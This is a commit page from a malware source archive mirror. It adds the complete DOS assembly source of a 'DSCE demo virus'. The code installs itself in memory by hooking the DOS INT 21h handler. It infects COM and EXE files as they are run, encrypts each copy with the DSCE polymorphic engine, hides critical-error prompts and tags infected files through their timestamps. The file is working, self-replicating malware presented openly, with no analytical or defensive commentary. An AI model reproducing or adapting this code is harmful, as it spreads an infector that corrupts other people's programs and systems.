daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:41:47 -06:00
committed by GitHub
parent 06c1f4dfdd
commit dc888afe59
99 changed files with 42193 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.dscedemo.asm
+450
View File
@@ -0,0 +1,450 @@
; A DEMO VIRUS FOR DSCE BY [PF]
.286
DEMO SEGMENT
ASSUME CS:DEMO,DS:DEMO
ORG 0000
VIR_LEN EQU OFFSET DSCE_END
EXTRN DSCE:NEAR,DSCE_END:NEAR
START: CALL BEG
BEG PROC
BEG ENDP
CLD
MOV AH,62H
INT 21H
MOV ES,BX
POP AX
SUB AX,3
SHR AX,4
MOV DX,CS
ADD AX,DX
PUSH AX
PUSH OFFSET CHK_MEMVIR
RETF
CHK_MEMVIR: PUSH CS
POP DS
MOV AX,4BDDH
INT 21H
CMP AX,0DD4BH
JZ RUN_OLD
MOV PSP_1,ES
MOV PSP_2,ES
MOV PSP_3,ES
MOV BX,VIR_LEN
MOV WORD PTR [BX],0A4F3H
MOV BYTE PTR [BX+2],0CBH
XOR DI,DI
MOV SI,DI
MOV AX,ES
ADD AX,10H
MOV ES,AX
MOV CX,VIR_LEN
PUSH ES
MOV AX,OFFSET CON
PUSH AX
CLD
JMP BX
RUN_OLD: PUSH ES
POP DS
CMP CS:FILE_MODE,0
JNZ RUN_EXE
MOV AX,CS:COM_HEAD1
MOV DS:[0100H],AX
MOV AH,CS:COM_HEAD2
MOV DS:[0102H],AH
MOV AX,0100H
MOV SP,0FFFEH
PUSH DS
PUSH AX
RETF
RUN_EXE: MOV AX,ES
ADD AX,10H
ADD CS:EXE_SS,AX
ADD CS:EXE_CS,AX
CLI
MOV SS,CS:EXE_SS
MOV SP,CS:EXE_SP
STI
JMP DWORD PTR CS:EXE_IP
RUN_OLD_M2: MOV AX,CS
MOV BX,VIR_LEN
ADD BX,200H
CLI
MOV SS,AX
MOV SP,BX
STI
MOV AH,4AH
MOV BX,VIR_LEN
ADD BX,BX
SHR BX,4
ADD BX,200H
MOV ES,PSP_1
INT 21H
MOV ES,ES:[2CH]
XOR DI,DI
XOR AX,AX
MOV CX,0FFFFH
GET_NAME: REPNZ SCASB
CMP AL,ES:[DI]
LOOPNZ GET_NAME
ADD DI,3
MOV RUN_DX,DI
MOV RUN_DS,ES
PUSH CS
POP ES
MOV AX,4B00H
MOV BX,OFFSET PCB
LDS DX,DWORD PTR CS:RUN_DX
INT 21H
MOV AH,4DH
INT 21H
MOV AH,31H
MOV DX,VIR_LEN
ADD DX,DX
SHR DX,4
ADD DX,0F0H
INT 21H
CON: PUSH CS
POP DS
MOV AX,3521H
INT 21H
MOV INT21_IP,BX
MOV INT21_CS,ES
MOV DX,OFFSET INT21
MOV AX,2521H
INT 21H
JMP RUN_OLD_M2
INT21_IP DW ?
INT21_CS DW ?
INT24_IP DW ?
INT24_CS DW ?
RUN_DX DW ?
RUN_DS DW ?
COM_HEAD1 DW 20CDH
COM_HEAD2 DB ?
EXE_HEAD DW ?
EXE_02H DW ?
EXE_04H DW ?
DW ?
EXE_08H DW ?
DW 2 DUP(?)
EXE_SS DW ?
EXE_SP DW ?
DW ?
EXE_IP DW ?
EXE_CS DW ?
NEW_SIZE_L DW ?
NEW_SIZE_H DW ?
PCB DW 0
DW 80H
PSP_1 DW ?
DW 5CH
PSP_2 DW ?
DW 6CH
PSP_3 DW ?
PATH_DX DW ?
PATH_DS DW ?
DATE_CX DW ?
DATE_DX DW ?
FILE_MODE DB 0
FILE_ATR DW ?
FILE_LEN DW ?
POP_BUFFER DW ?
VIR_BUFFER DB 20H DUP (?)
SP_BUF DW ?
SS_BUF DW ?
VIR_MSG DB "This is a DSCE's Demo Virus written by [P.F]"
INT21: PUSHF
CLD
CALL INF_PUSH
CMP AX,4BDDH
JNZ I21_CON
CALL INF_POP
MOV AX,0DD4BH
POPF
IRET
I21_CON: CMP AX,4B00H
JZ I21_RUN
I21_END: CALL INF_POP
POPF
JMP DWORD PTR CS:INT21_IP
I21_CLOSE: MOV AH,3EH
INT 21H
JMP I21_END
I21_RUN: MOV CS:PATH_DS,DS
MOV CS:PATH_DX,DX
MOV AX,3D00H
INT 21H
I21_END_L1: JC I21_END
XCHG AX,BX
PUSH CS
POP DS
MOV AX,5700H
INT 21H
CMP DX,0C800H
JA I21_CLOSE
MOV DATE_CX,CX
MOV DATE_DX,DX
MOV AH,3FH
MOV CX,3
MOV DX,OFFSET COM_HEAD1
INT 21H
CMP AX,CX
JNZ I21_CLOSE
CMP COM_HEAD1,4D5AH
JZ SET_MODE
CMP COM_HEAD1,5A4DH
JNZ SET_M_COM
SET_MODE: MOV FILE_MODE,1
MOV AX,4200H
XOR CX,CX
XOR DX,DX
INT 21H
MOV AH,3FH
MOV CX,18H
MOV DX,OFFSET EXE_HEAD
INT 21H
JMP SHORT I21_OPEN
SET_M_COM: MOV FILE_MODE,0
MOV AX,4202H
XOR CX,CX
XOR DX,DX
INT 21H
OR DX,DX
JNZ I21_CLOSE
CMP AX,0C000H
JA I21_CLOSE
MOV FILE_LEN,AX
I21_OPEN: MOV AH,3EH
INT 21H
PUSH PATH_DX
PUSH PATH_DS
POP DS
POP DX
MOV AX,4300H
INT 21H
JC I21_END_L1
MOV CS:FILE_ATR,CX
MOV AX,4301H
XOR CX,CX
INT 21H
MOV AX,3D02H
INT 21H
JC I21_END_L2
XCHG AX,BX
PUSH CS
POP DS
PUSH BX
MOV AX,3524H
INT 21H
MOV INT24_IP,BX
MOV INT24_CS,ES
MOV AX,2524H
MOV DX,OFFSET INT24
INT 21H
POP BX
CALL WRITE
MOV AH,3EH
INT 21H
MOV AX,2524H
PUSH INT24_IP
PUSH INT24_CS
POP DS
POP DX
INT 21H
PUSH CS:PATH_DX
PUSH CS:PATH_DS
POP DS
POP DX
MOV AX,4301H
MOV CX,CS:FILE_ATR
INT 21H
I21_END_L2: JMP I21_END
INT24: XOR AL,AL
IRET
WRITE PROC
MOV SP_BUF,SP
MOV SS_BUF,SS
MOV AX,VIR_LEN + 5DCH
MOV DX,CS
CLI
MOV SS,DX
MOV SP,AX
STI
CMP FILE_MODE,0
JZ WRITE_COM
JMP SHORT WRITE_EXE
WRITE_COM: MOV SI,OFFSET VIR_BUFFER
MOV BYTE PTR [SI],0E9H
MOV AX,FILE_LEN
PUSH AX
SUB AX,3
MOV [SI+1],AX
MOV AX,4200H
XOR CX,CX
XOR DX,DX
INT 21H
MOV AH,40H
MOV DX,SI
MOV CX,3
INT 21H
MOV AX,4202H
XOR CX,CX
XOR DX,DX
INT 21H
MOV AX,VIR_LEN + 600H
MOV DX,CS
SHR AX,4
INC AX
ADD AX,DX
MOV ES,AX
MOV DX,OFFSET START
MOV CX,VIR_LEN
POP BP
ADD BP,0100H
PUSH BX
MOV BL,10B
CALL DSCE
POP BX
MOV AH,40H
INT 21H
PUSH CS
POP DS
SET_DATE: MOV AX,5701H
MOV CX,DATE_CX
MOV DX,DATE_DX
ADD DX,0C800H
INT 21H
MOV AX,SP_BUF
MOV DX,SS_BUF
CLI
MOV SS,DX
MOV SP,AX
STI
RET
WRITE_EXE: PUSH CS
POP ES
MOV SI,OFFSET EXE_HEAD
MOV DI,OFFSET VIR_BUFFER
MOV CX,18H
REP MOVSB
MOV AX,4202H
XOR CX,CX
XOR DX,DX
INT 21H
ADD AX,0FH
ADC DX,0
AND AX,0FFF0H
MOV NEW_SIZE_L,AX
MOV NEW_SIZE_H,DX
MOV CX,10H
DIV CX
MOV DI,OFFSET VIR_BUFFER
SUB AX,[DI+8]
MOV [DI+16H],AX
MOV [DI+0EH],AX
MOV WORD PTR [DI+14H],0
MOV [DI+10H],0FFFEH
MOV AX,4200H
MOV DX,NEW_SIZE_L
MOV CX,NEW_SIZE_H
INT 21H
MOV AX,VIR_LEN + 600H
MOV DX,CS
SHR AX,4
INC AX
ADD AX,DX
MOV ES,AX
MOV DX,OFFSET START
MOV CX,VIR_LEN
MOV BP,0
PUSH BX
MOV BL,11B
CALL DSCE
POP BX
MOV AH,40H
INT 21H
PUSH CS
POP DS
MOV AX,NEW_SIZE_L
MOV DX,NEW_SIZE_H
ADD AX,CX
ADC DX,0
MOV CX,200H
MOV DI,OFFSET VIR_BUFFER
DIV CX
OR DX,DX
JZ GET_NEW
INC AX
GET_NEW: MOV [DI+4],AX
MOV [DI+2],DX
MOV AX,4200H
XOR CX,CX
XOR DX,DX
INT 21H
MOV AH,40H
MOV CX,18H
MOV DX,DI
INT 21H
JMP SET_DATE
WRITE ENDP
INF_PUSH PROC
POP CS:POP_BUFFER
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH BP
PUSH DS
PUSH ES
JMP CS:POP_BUFFER
INF_PUSH ENDP
INF_POP PROC
POP CS:POP_BUFFER
POP ES
POP DS
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
JMP CS:POP_BUFFER
INF_POP ENDP
DEMO ENDS
END START